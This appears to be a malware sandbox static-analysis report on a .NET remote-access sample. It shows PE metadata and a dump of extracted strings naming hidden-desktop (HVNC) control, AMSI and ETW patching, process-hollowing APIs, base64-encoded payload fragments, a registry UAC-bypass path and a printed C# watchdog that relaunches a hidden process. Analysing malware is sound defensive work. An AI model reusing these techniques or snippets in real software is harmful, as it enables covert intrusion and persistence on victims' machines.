popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2038-05-07 06:56:32

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00080914 0x00080a00 4.0546732606
.rsrc 0x00084000 0x0000059e 0x00000600 4.06687105279
.reloc 0x00086000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000840a0 0x00000314 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000843b4 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPa
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Management;
using System.Threading;
using System.Windows.Forms;
namespace icarus
class Program
[STAThread]
public static void Main()
{
StartmyZed();
System.Timers.Timer timer = new System.Timers.Timer(1000);
timer.Elapsed += Timer_Elapsed;
timer.Start();
while (true)
{
}
}
private static void Timer_Elapsed(object sender, System.Timers.ElapsedEventArgs e)
{
System.Diagnostics.Process[] proc = System.Diagnostics.Process.GetProcessesByName("%NAME%");
if (proc.Length > 0)
{
}
else
{
StartmyZed();
}
}
public static void StartmyZed()
{
try
{
if (Information.UBound(Process.GetProcessesByName("%NAME%")) < 0)
{
ProcessStartInfo processStartInfo = new ProcessStartInfo();
processStartInfo.FileName = @"%PATH%";
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(processStartInfo);
//Process.GetCurrentProcess().Kill();
//Application.Exit();
}
}
catch (Exception projectError)
{
ProjectData.SetProjectError(projectError);
ProjectData.ClearProjectError();
}
}
v4.0.30319
#Strings
D84F4C120005F1837DC65C04181F3DA9466B123FC369C359A301BABC12061570
UL7GOPAFMSA0
VQKSESE2T2B0
SPDRP_UNUSED0
TXHSAXM66JP0
KRN8JXP13NR0
C8GA5S53INU0
J51Z2NGKOSU0
35ESNZMDXVY0
<WatchDogStart>b__0
string_0
registryKey_0
UNHDYV5BIO01
SPDRP_UNUSED1
9K0SFAV5ZQI1
2OHYL7DDS4J1
544Z8V0LGEL1
FALEOI2TYJM1
FIN_WAIT_1
List`1
Unused1
Reserved1
get_String1
remotePort1
localPort1
RIZP6FCCT112
LU59UJXPJJ12
SHELL32
kernel32
Microsoft.Win32
ToInt32
SPDRP_UNUSED2
LH9OAZ7XCGK2
AJS1EY0ZMLK2
FIN_WAIT_2
IDictionary`2
cbReserved2
lpReserved2
remotePort2
localPort2
0UBVLNDF3V33
WGACGIXG53J3
MAM388EMFVR3
PWEWVNYFDXT3
P4N7QSKC7NV3
remotePort3
localPort3
4JFH9AA98024
E0V5PCQ7MJ54
TOR0N6VA2X74
3QM3DIZDPHF4
TMRQSFOHH3I4
T1W9GI4MX2P4
remotePort4
localPort4
7YJM88AF10C5
KCV4RFZMRQJ5
N9F2QK5L9NV5
ToUInt16
ToInt16
JHGWBU2YBKB6
S68W916YBTD6
ALU568Q2DUO6
UX6X1490DGG7
YZGT5JN1GF38
P87JPMP8T1C8
get_UTF8
WMHIQVFLKAK8
C0B3UBAVL2U8
GNYLUFAVSS19
GPSS2Z8PHY59
X7GB7TLKCHL9
05NH3J796PS9
09KXO5EZUIT9
GVJVXD8M1AW9
QAAK2HH2JUW9
P1EZJKS1L20A
KC8NL3HDBLBA
1F1YCFO7WWDA
TIA6476UQVFA
SPDRP_DEVICE_POWER_DATA
AVENX1SSSATA
CreateProcessA
LoadLibraryA
049RHO15RY4B
AEK56I34EA5B
FSP4KRFM6EDB
R9KCIYYKLRFB
BI_RGB
OX54VKLOLVJB
LK2MSIKCBNXB
UHJ0YNH43O6C
8W1V8W6T2CBC
hSrcDC
CreateCompatibleDC
ReleaseDC
DeleteDC
hDestDC
GetWindowDC
EKQL3IF474FC
0C50C67E839472CD612D6033109F5E032987E48E367247F29C0EB30A1D3EB5FC
2N9KFWW49CGC
UDP_TABLE_BASIC
1FN36K3C47JC
KillHVNC
StartHVNC
SPDRP_DEVICEDESC
BDWN8RQ1TPSC
P6OWEKW57PUC
AYOLM0TW3YUC
LWMPHYTGFCYC
WTCQJGHBLV8D
ORHGE6XW63CD
ESTABLISHED
SHGFI_ATTR_SPECIFIED
WS_DISABLED
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
CLOSED
SHGFI_SELECTED
WS_EX_COMPOSITED
1XNGVZEX9XED
SW_SHOWMINIMIZED
SW_SHOWMAXIMIZED
SPDRP_HARDWAREID
UDP_TABLE_OWNER_PID
SPDRP_BUSTYPEGUID
SPDRP_CLASSGUID
GetMenuItemID
sessionID
m_lstProcessID
processID
I9S6SSAC4NKD
SRCAND
WM_SYSCOMMAND
DESKTOP_JOURNALRECORD
YG4FX4XBPYRD
QXHSP7011SSD
HYM5QOJVK8TD
SYN_RCVD
ExclusionWD
VNJZ29BAJQYD
DIGCF_DEVICEINTERFACE
SPDRP_SERVICE
SW_HIDE
SPDRP_REMOVAL_POLICY_OVERRIDE
L4RSAU78Z6IE
DIGCF_PROFILE
UDP_TABLE_OWNER_MODULE
GWL_STYLE
CCHDEVICENAME
SHGFI_TYPENAME
CCHFORMNAME
SHGFI_DISPLAYNAME
SPDRP_FRIENDLYNAME
UOI_NAME
SPDRP_ENUMERATOR_NAME
SPDRP_PHYSICAL_DEVICE_OBJECT_NAME
DESKTOP_NONE
HALFTONE
SHGFI_EXETYPE
SPDRP_LEGACYBUSTYPE
SPDRP_DEVTYPE
EDWSB12740RE
SC_RESTORE
S_FALSE
HTCLOSE
WM_CLOSE
DESKTOP_ENUMERATE
SPDRP_INSTALL_STATE
SPDRP_EXCLUSIVE
WM_MOUSEMOVE
SC_MINIMIZE
SC_MAXIMIZE
SHGFI_SHELLICONSIZE
C9A90VBHOB2F
SMQ922T4N84F
1Y12I4US4FEF
S3GI0KBA3SHF
OHLT1P5C4UHF
HERJHFR2ZXSF
LOQFJR0Q5Q1G
KPWJLTLET05G
LUTNE1U60B9G
T2W5HBEZGJBG
4OLXULEEDREG
SPDRP_MFG
LISTENING
CLOSING
E_INVALIDARG
360UZROZA9TG
5TCSVNWMH0WG
CDSQEKCY1XCH
YVKUIO4MC9JH
N01UYOSNF6KH
MAX_PATH
K3DYQ2M0BJ1I
VNX5V6Y2VU6I
D4558SL97BKI
I0HWJYHI42LI
8GG04N071YPI
HZYUW388BKUI
UpdateDriverUI
YRLOQTKLCOMJ
2OEB16IDQKQJ
QTC8PG9M79UJ
BNAG4D2ITQXJ
3RNHZM7LRTXJ
DESKTOP_JOURNALPLAYBACK
LAST_ACK
E7HW7UVECHIK
WM_LBUTTONDBLCLK
WM_RBUTTONDBLCLK
GY27R5V0H6MK
DF_ALLOWOTHERACCOUNTHOOK
BRODLN3KG5PK
GVRZ438VYLPK
QKI5QFUI2WVK
UNXCAJDGTYYK
DJQ1K89PRR2L
SW_NORMAL
SHGFI_PIDL
B282ONV4NUDL
WM_MOUSEWHEEL
M1JOL6YMQTEL
EEAWBFDGZEFL
GENERIC_ALL
TCP_TABLE_BASIC_ALL
TCP_TABLE_OWNER_PID_ALL
TCP_TABLE_OWNER_MODULE_ALL
WM_HSCROLL
WM_VSCROLL
DESKTOP_HOOKCONTROL
BIG1KADY5SJM
JE5GDJ0TC2LM
BBT14KHXVMNM
HTBOTTOM
JAFV2RDWG5VM
C8EMFYK3RA0N
X12JRT72FL0N
Y8KKA948PM0N
SEVU8OU2LZ3N
AQ2QXKKSWQ7N
SM_CXSCREEN
SM_CYSCREEN
KHWXPA6RC3JN
SHGFI_LARGEICON
SHGFI_SMALLICON
SHGFI_OPENICON
SHGFI_ICON
SHGFI_ICONLOCATION
SPDRP_LOCATION_INFORMATION
STARTF_USEPOSITION
HTCAPTION
MK_LBUTTON
HTMINBUTTON
MK_RBUTTON
HTMAXBUTTON
SB_LINEDOWN
WM_LBUTTONDOWN
WM_RBUTTONDOWN
WM_KEYDOWN
HYLNLWEGFQZN
2ND5LEAICY0O
GCCLAZHZ1Y5O
PQRN961QXN8O
System.IO
9IC6YBW99T8P
DELETE_TCP
C4LWJA6ZHDGP
1GUA4MT9A5MP
DESKTOP_SWITCHDESKTOP
JUS56OXRKJQP
SB_LINEUP
WM_LBUTTONUP
WM_RBUTTONUP
WM_KEYUP
SLI2K08TAK4Q
9SQZWBNBEW5Q
QT4M4AM713HQ
YBN5ETWY8FXQ
PAK8JBZ8891R
ANC7FYTPA22R
WM_CHAR
SPDRP_BUSNUMBER
SPDRP_UI_NUMBER
TCP_TABLE_BASIC_LISTENER
TCP_TABLE_OWNER_PID_LISTENER
TCP_TABLE_OWNER_MODULE_LISTENER
SPDRP_DRIVER
8M3118BCV3GR
W3Q84HSCKNGR
07VED4KXLMKR
GDI_ERROR
C33F13T0Q2UR
SUJTECED3CVR
LOXV7ZO7VA1S
SPDRP_CHARACTERISTICS
CYLT4GJ5UDDS
SPDRP_COMPATIBLEIDS
SPDRP_SECURITY_SDS
SPDRP_CAPABILITIES
STARTF_USESTDHANDLES
DIGCF_ALLCLASSES
SHGFI_USEFILEATTRIBUTES
SHGFI_ATTRIBUTES
SPDRP_CONFIGFLAGS
MFB9JSUSOFHS
SPDRP_LOCATION_PATHS
VF2W3Y38ELLS
TCP_TABLE_BASIC_CONNECTIONS
TCP_TABLE_OWNER_PID_CONNECTIONS
TCP_TABLE_OWNER_MODULE_CONNECTIONS
SPDRP_UPPERFILTERS
SPDRP_LOWERFILTERS
DIB_RGB_COLORS
SPDRP_CLASS
NORMAL_PRIORITY_CLASS
SPDRP_ADDRESS
K2CLSFFA89TS
DESKTOP_READOBJECTS
DESKTOP_WRITEOBJECTS
ES_CONTINUOUS
SHGFI_ADDOVERLAYS
1E7PJT5DZK3T
MCDH38EBX86T
SPDRP_UI_NUMBER_DESC_FORMAT
SJUFKBKJMEDT
HTBOTTOMLEFT
HTTOPLEFT
HTLEFT
HTBOTTOMRIGHT
HTTOPRIGHT
HTRIGHT
TIME_WAIT
CLOSE_WAIT
DIGCF_DEFAULT
SPDRP_REMOVAL_POLICY_HW_DEFAULT
HTTRANSPARENT
DIGCF_PRESENT
SYN_SENT
KC9HD0RS43RT
GW_HWNDLAST
WM_NCHITTEST
WZ51FJAGELST
GW_HWNDNEXT
PMVG173Y156U
ZGIOB3R4SL6U
4D5GKWRODRKU
DESKTOP_CREATEMENU
MN_GETHMENU
NX2PGVNZEJTU
VBEIXK7UQ4UU
1GXBYWP3EO1V
VDGQNOA80H4V
HTTPUWU5L78V
GHLML8WSFIDV
GW_HWNDPREV
RNRLXQLWP6IV
V1KGM74UX0OV
7C105GZXHVAW
9EO7YCBTSMEW
3DYOJCSE7YEW
B0M0DQ3S1VJW
YK9FAX1L79MW
DESKTOP_CREATEWINDOW
STARTF_USESHOWWINDOW
LKW71P2FI1TW
JQOQGQMMKPUW
CreateFileW
CreateDesktopW
TD7UTAAY3A1X
YM05VNKN4X3X
46784DJU25DX
SHGFI_SYSICONINDEX
SHGFI_OVERLAYINDEX
TKLSHM9FZVEX
72DUFN8AQNHX
C2ZIUDTD9HIX
SS5QVPWCMTIX
5HNVM6ULUWQX
IS7WO8NMQ5ZX
7TBKSUID2QZX
7OZU3KM0TA2Y
B7UXP2V8DN3Y
SHGFI_LINKOVERLAY
SPDRP_REMOVAL_POLICY
09HZ2YJVY6GY
E7U4F68MWCGY
SRCCOPY
E_OUTOFMEMORY
SPDRP_SECURITY
RC88LH4CKMTY
VT6D14VEFVWY
LJKTQXILLZEZ
VOIWZGV5GROZ
EJN36Q2U65WZ
value__
DestroypublicData
DestroyWizardData
DeviceInfoData
deviceInfoData
SizeOfRawData
PointerToRawData
dwData
hwinsta
mscorlib
ConfigSpecific
System.Collections.Generic
AddPropertyPageBasic
Microsoft.VisualBasic
lpEnumFunc
DesktopProc
DesktopWindowsProc
hdcSrc
get_Id
GetThreadId
GetCurrentThreadId
dwThreadId
ProcessIdToSessionId
GetProcessId
GetCurrentProcessId
dwProcessId
processId
GetProcessById
OpenRead
bytesRead
ResumeThread
hThread
ProcessThread
thread
rgbRed
AddPropertyPageAdvanced
AddRemotePropertyPageAdvanced
lpnLengthNeeded
IsInstalled
IsZoomed
samDesired
biClrUsed
CheckDisposed
m_disposed
rgbReserved
lpReserved
reserved
System.Collections.Specialized
Synchronized
owningPid
ClassGuid
FixedElementField
showCmd
ReadToEnd
Append
RegistryValueKind
UBound
EnumHwndsPrintMethod
method
InstallWizard
Replace
CalcDiskSpace
FoundDevice
InstallDevice
RegisterDevice
SelectDevice
lpszDevice
device
defaultInstance
hdcSource
CompileAssemblyFromSource
deviceMode
FileMode
shareMode
iStretchMode
SetStretchBltMode
pDevmode
biSizeImage
GetWindowImage
iUsage
uUsage
get_Message
SendMessage
uCallbackMessage
SHAppBarMessage
PostMessage
dwMessage
StateChange
PropChange
PropertyChange
PowerMessageWake
EndInvoke
BeginInvoke
GetExtendedTcpTable
pTcpTable
GetExtendedUdpTable
pUdpTable
ICloneable
Enable
Disable
IDisposable
IsWindowVisible
compatible
get_Handle
ThreadHandle
RuntimeFieldHandle
wndHandle
GetModuleHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
TokenHandle
get_DesktopHandle
desktopHandle
ProcessHandle
bInheritHandle
SetFileInformationByHandle
m_handle
Rectangle
templateFile
DeleteFile
InstallFile
HwProfile
IsInRole
WindowsBuiltInRole
FreeConsole
lpTitle
hModule
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
procName
get_FileName
set_FileName
GetModuleFileName
lpModuleName
szTypeName
get_FullName
lpApplicationName
applicationName
get_DesktopName
GetDesktopName
m_desktopName
bAppName
lpClassName
GetClassName
get_ProcessName
lpWindowName
GetProcessesByName
szDisplayName
DirectoryName
lpFilename
filename
lpCommandLine
commandLine
WriteLine
Combine
CallbackRoutine
propertyRegDataType
ValueType
cchType
CallbackType
SecurityProtocolType
dumpType
pszType
Prepare
SetProcessDPIAware
get_Culture
set_Culture
resourceCulture
MethodBase
ReadOnlyCollectionBase
ApplicationSettingsBase
Dispose
StartProcesse
Create
MulticastDelegate
EditorBrowsableState
SetThreadExecutionState
SetApartmentState
Delete
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
UnsafeValueTypeAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
FixedBufferAttribute
UnmanagedFunctionPointerAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
dLByte
rgbBlue
GetValue
SetValue
set_Expect100Continue
caseInsensitive
UnRemove
dwXSize
dwYSize
get_Size
cbSize
requiredSize
biSize
VirtualSize
propertyBufferSize
bufferSize
classInstallParamsSize
dwSize
SuppressFinalize
buffersize
NewDeviceWizardPreAnalyze
NewDeviceWizardPostAnalyze
SizeOf
IndexOf
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
ToString
lpString
GetString
Substring
disposing
System.Drawing
dwNewLong
GetWindowLong
SetWindowLong
set_ErrorDialog
get_ExecutablePath
get360InstallPath
GetTempPath
GetFolderPath
pszPath
get_Width
nSrcWidth
biWidth
nWidth
nDestWidth
get_Length
FileNameLength
MaxWindowNameLength
nLength
length
LoadApi
CreateApi
PatchingAmsi
PtrToStringAnsi
AsyncCallback
VmPreReadCallback
VmPostReadCallback
IncludeThreadCallback
IncludeModuleCallback
ReadMemoryFailureCallback
IoFinishCallback
CancelCallback
IoWriteAllCallback
IncludeVmRegionCallback
WriteKernelMinidumpCallback
SecondaryFlagsCallback
KernelMinidumpStatusCallback
IsProcessSnapshotCallback
VmStartCallback
IoStartCallback
ThreadExCallback
VmQueryCallback
RemoveMemoryCallback
callback
tosuck
accessMask
g_hDesk
AllocHGlobal
FreeHGlobal
Marshal
System.Security.Principal
WindowsPrincipal
ConfigGeneral
DetectCancel
System.ComponentModel
GetPixel
NewDeviceWizardFinishInstall
AllowInstall
gdi32.dll
advapi32.dll
kernel32.dll
shell32.dll
user32.dll
iphlpapi.dll
setupapi.dll
dbghelp.dll
set_SecurityProtocol
lpwndpl
FileStream
CallbackParam
callbackParam
lParam
userStreamParam
expParam
wParam
lparam
wparam
get_Item
System
Random
random
Bottom
resourceMan
uStartScan
Boolean
dwOutBufLen
hidden
rgbGreen
hDCScreen
hDcScreen
IsBlackScreen
bmpScreen
ptScreen
m_lstScreen
OpenProcessToken
get_IsOpen
KillProcessAndChildren
CollectProcessAndChildren
lpNumberOfBytesWritten
bytesWritten
AppDomain
DrawIcon
ipVersion
biCompression
Application
set_IncludeDebugInformation
lpProcessInformation
processInformation
GetUserObjectInformation
pfileinformation
System.Configuration
GetProcessWindowStation
System.Globalization
Interaction
ZwUnmapViewOfSection
System.Reflection
ProcessThreadCollection
StringCollection
CompilerErrorCollection
ManagementObjectCollection
DiFunction
lpEnumCallbackFunction
installFunction
rcNormalPosition
ptMinPosition
ptMaxPosition
creationDisposition
CallingConvention
ObjectDisposedException
ArgumentException
FormatScreenResolution
resolution
Environ
HandleRun
TryRun
EnumWindowsTopToDown
dwExtraInfo
FileBasicInfo
FileIdInfo
MethodInfo
FileStandardInfo
SetupDiEnumDeviceInfo
FileStorageInfo
cbFileInfo
FileEndOfFileInfo
SHGetFileInfo
FileNameInfo
FileRenameInfo
CultureInfo
FileAttributeTagInfo
FileRemoteProtocolInfo
FileStreamInfo
FileSystemInfo
lpSystemInfo
FileCompressionInfo
FileAllocationInfo
FileDispositionInfo
lpStartupInfo
startupInfo
ParameterInfo
GetCursorInfo
lpBitsInfo
FileAlignmentInfo
FileIoPriorityHintInfo
get_StartInfo
set_StartInfo
ProcessStartInfo
FileIdExtdDirectoryRestartInfo
FileIdBothDirectoryRestartInfo
FileFullDirectoryRestartInfo
pvInfo
FileIdExtdDirectoryInfo
FileIdBothDirectoryInfo
FileFullDirectoryInfo
RasterOp
CreateCompatibleBitmap
FromHbitmap
MiniDumpWriteDump
WatchDogStop
GetThreadDesktop
SetThreadDesktop
CloseDesktop
CreateDesktop
SwitchDesktop
OpenDesktop
lpDesktop
OpenDefaultDesktop
OpenInputDesktop
hNewDesktop
lpszDesktop
m_desktop
Microsoft.CSharp
FirstTimeSetup
remoteAddr
localAddr
bmiHeader
StreamReader
TextReader
CSharpCodeProvider
CodeDomProvider
StringBuilder
SpecialFolder
folder
lpBuffer
propertyBuffer
buffer
get_ResourceManager
ServicePointManager
ManagementObjectSearcher
System.CodeDom.Compiler
SetupDiCallClassInstaller
CurrentUser
biXPelsPerMeter
biYPelsPerMeter
ToGenericParameter
hWndInsertAfter
StreamWriter
TextWriter
GetDelegateForFunctionPointer
Troubleshooter
BitConverter
ValidateDriver
ToLower
set_RedirectStandardError
hStdError
CompilerError
hCursor
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
Monitor
lpSecurityDescriptor
IntPtr
dwFileAttribs
GetSystemMetrics
Characteristics
System.Diagnostics
get_Threads
get_Bounds
InstallInterfaces
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
System.Resources
AssignResources
IcarusStub.Properties.Resources.resources
DebuggingModes
referencedAssemblies
dwNumEntries
Properties
bInheritHandles
inheritHandles
InstallDeviceFiles
biPlanes
cScanLines
GetProcesses
GetInputProcesses
set_Attributes
lpThreadAttributes
threadAttributes
flagsAndAttributes
FileAttributes
lpProcessAttributes
processAttributes
dwAttributes
attributes
ReadAllBytes
WriteAllBytes
BufferBytes
GetBytes
dwCreationFlags
creationFlags
esFlags
uFlags
dwFlags
SetupDiSetClassInstallParams
classInstallParams
System.Windows.Forms
get_AllScreens
Contains
Conversions
NumberOfRelocations
PointerToRelocations
System.Collections
ulOptions
set_CompilerOptions
ptScreenPos
GetCursorPos
SetWindowPos
EnumDesktops
GetDesktops
get_Chars
dwXCountChars
dwYCountChars
NumberOfLinenumbers
PointerToLinenumbers
RegisterCoInstallers
RuntimeHelpers
getRandomCharacters
CompilerParameters
GetParameters
ValidateClassDrivers
InstallClassDrivers
SelectClassDrivers
bmiColors
get_Errors
EnableClass
tblClass
RealGetWindowClass
fileinformationclass
dwDesiredAccess
desiredAccess
FileAccess
IsWow64Process
CreateProcess
hProcess
GetCurrentProcess
StartProcess
process
IPAddress
GetProcAddress
lpBaseAddress
baseAddress
get_LocalAddress
VirtualAddress
lpAddress
address
AccessRights
StretchDIBits
GetDIBits
lpBits
lpvBits
CompilerResults
set_Arguments
get_Exists
ReplaceIfExists
status
SetupDiGetClassDevs
EnumDesktopWindows
GetWindows
m_windows
Concat
Format
lpRect
GetWindowRect
ManagementBaseObject
DeleteObject
hObject
SelectObject
ManagementObject
object
NewDeviceWizardSelect
NewDeviceWizardPreSelect
Detect
lpflOldProtect
flNewProtect
protect
System.Net
DeviceInfoSet
deviceInfoSet
alphabet
Offset
get_Height
nSrcHeight
biHeight
nHeight
nDestHeight
op_Explicit
fInherit
WaitForExit
hdcBlt
StretchBlt
BitBlt
get_Default
IAsyncResult
DialogResult
hkResult
result
biClrImportant
WebClient
ScreenToClient
GetWindowPlacement
System.Management
lpEnvironment
environment
hWndParent
hwndParent
GetParent
get_Current
GetCurrent
SetCurrent
pbDebuggerPresent
CheckRemoteDebuggerPresent
IsDebuggerPresent
keybd_event
mouse_event
bRepaint
MenuItemFromPoint
ChildWindowFromPoint
lpPoint
get_EntryPoint
get_Count
biBitCount
nMaxCount
BCutEncrypt
ParameterizedThreadStart
WatchDogStart
Convert
get_RemotePort
get_LocalPort
localPort
nXDest
nYDest
hdcDest
GetProcessIDList
get_List
GetScreenList
SetupDiDestroyDeviceInfoList
ArrayList
DevInst
hStdInput
CallbackInput
OpenInput
set_RedirectStandardOutput
hStdOutput
CallbackOutput
MoveNext
System.Text
get_Text
injText
GetWindowText
m_text
Wow64GetThreadContext
Wow64SetThreadContext
context
SelectBestCompatDrv
FindWindow
GetForegroundWindow
SetForegroundWindow
GetConsoleWindow
MoveWindow
set_CreateNoWindow
GetTopWindow
GetDesktopWindow
g_hCurWindow
GetWindow
GetCurrentWindow
SetCurrentWindow
PaintWindow
PrintWindow
m_lstWindow
GetNextWindow
wShowWindow
nCmdShow
PatchingEtw
VirtualAllocEx
VirtualProtectEx
RegOpenKeyEx
smIndex
nIndex
MemberIndex
MessageBox
processx
InitializeArray
ToCharArray
CreateSubKey
OpenSubKey
subKey
GetRegKey
RegistryKey
checksubkey
DetectVerify
get_Assembly
set_OutputAssembly
BlockCopy
LoadLibrary
ReadProcessMemory
WriteProcessMemory
CopyMemory
CreateDirectory
lpCurrentDirectory
currentDirectory
RootDirectory
InstallRegistry
op_Equality
op_Inequality
System.Security
WindowsIdentity
IsNullOrEmpty
SetupDiGetDeviceRegistryProperty
property
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
H82VDNAHSST6
BFK7OYICE384
1QNJUQZJVIL6
NX1HD5957KE9
V0HIUA9OA73X
$f3acc6fb-8e6f-4327-b555-7e83471e1656
91WC3KL33OT0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
XSystem.Byte, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
String1
! " # $ %$& ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C EDFDGDJIKIONPNQNRNSNTNUNVNWNXNYN]\
a2VybmVsMzI=
UmVzdW1lVGhyZWFk
V293NjRTZXRUaHJlYWRDb250ZXh0
U2V0VGhyZWFkQ29udGV4dA==
V293NjRHZXRUaHJlYWRDb250ZXh0
R2V0VGhyZWFkQ29udGV4dA==
VmlydHVhbEFsbG9jRXg=
V3JpdGVQcm9jZXNzTWVtb3J5
UmVhZFByb2Nlc3NNZW1vcnk=
bnRkbGw=
WndVbm1hcFZpZXdPZlNlY3Rpb24=
Q3JlYXRlUHJvY2Vzc0E=
U3RhcnQuZXhl
TVNCdWlsZHMuZXhl
Y3Z0cmVzYS5leGU=
WW91clBob25lLmV4ZQ==
UnVudGltZUJyb2tlci5leGU=
c3lzdGVtLmV4ZQ==
IC90YXJnZXQ6d2luZXhlIC9wbGF0Zm9ybTphbnljcHUgL29wdGltaXplKw==
JU5BTUUl
LmV4ZQ==
JVBBVEgl
Q29tcGlsZXJWZXJzaW9u
djQuMA==
c3Zsb3N0
c3Zsb3N0LmV4ZQ==
U3lzdGVtLmRsbA==
U3lzdGVtLk1hbmFnZW1lbnQuZGxs
U3lzdGVtLldpbmRvd3MuRm9ybXMuZGxs
U3lzdGVtLkRyYXdpbmcuZGxs
TWljcm9zb2Z0LlZpc3VhbEJhc2ljLmRsbA==
U3lzdGVtLlJlZmxlY3Rpb24uZGxs
U3lzdGVtLlRocmVhZGluZy5kbGw=
U3lzdGVtLlRocmVhZGluZy5UYXNrcy5kbGw=
U3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5kbGw=
L2sgc3RhcnQgL2Ig
ICAmIGV4aXQ=
UmVtb3RlRGVza3RvcA==
VHJ1ZQ==
Y3Z0cmVzLmV4ZQ==
V2luZG93c1xleHBsb3Jlci5leGU=
VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFnQUFBQUE0ZnVnNEF0QW5OSWJnQlRNMGhWR2hwY3lCd2NtOW5jbUZ0SUdOaGJtNXZkQ0JpWlNCeWRXNGdhVzRnUkU5VElHMXZaR1V1RFEwS0pBQUFBQUFBQUFCUVJRQUFUQUVEQUoyNWdJMEFBQUFBQUFBQUFPQUFJZ0FMQVRBQUFQSUJBQUFJQUFBQUFBQUFWZzBDQUFBZ0FBQUFJQUlBQUFCQUFBQWdBQUFBQWdBQUJBQUFBQUFBQUFBR0FBQUFBQUFBQUFCZ0FnQUFBZ0FBQUFBQUFBTUFZSVVBQUJBQUFCQUFBQUFBRUFBQUVBQUFBQUFBQUJBQUFBQUFBQUFBQUFBQUFBRU5BZ0JQQUFBQUFDQUNBSFFGQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUVBQ0FBd0FBQUM0Q3dJQVZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFDQUFBQUFBQUFBQUFBQUFBQ0NBQUFFZ0FBQUFBQUFBQUFBQUFBQzUwWlhoMEFBQUEvUEVCQUFBZ0FBQUE4Z0VBQUFJQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUdBdWNuTnlZd0FBQUhRRkFBQUFJQUlBQUFZQUFBRDBBUUFBQUFBQUFBQUFBQUFBQUFCQUFBQkFMbkpsYkc5akFBQU1BQUFBQUVBQ0FBQUNBQUFBK2dFQUFBQUFBQUFBQUFBQUFBQUFRQUFBUWdBQUFBQUFBQUFBQUFBQUFBQUFBQUExRFFJQUFBQUFBRWdBQUFBQ0FBVUFSTGdBQUFRMkFRQURBQUlBQWdBQUJranVBUUJ3SFFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2NC4wLjMwMzE5XA==
QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2NC4wLjMwMzE5XGN2dHJlcy5leGU=
QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XA==
QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XGN2dHJlcy5leGU=
VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjVj
U2hlbGw=
ZXhwbG9yZXIuZXhlLCA=
VTI5bWRIZGhjbVZjVFdsamNtOXpiMlowWEZkcGJtUnZkM01nVGxSY1EzVnljbVZ1ZEZabGNuTnBiMjVjVjJsdWJHOW5iMjQ9
U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQ=
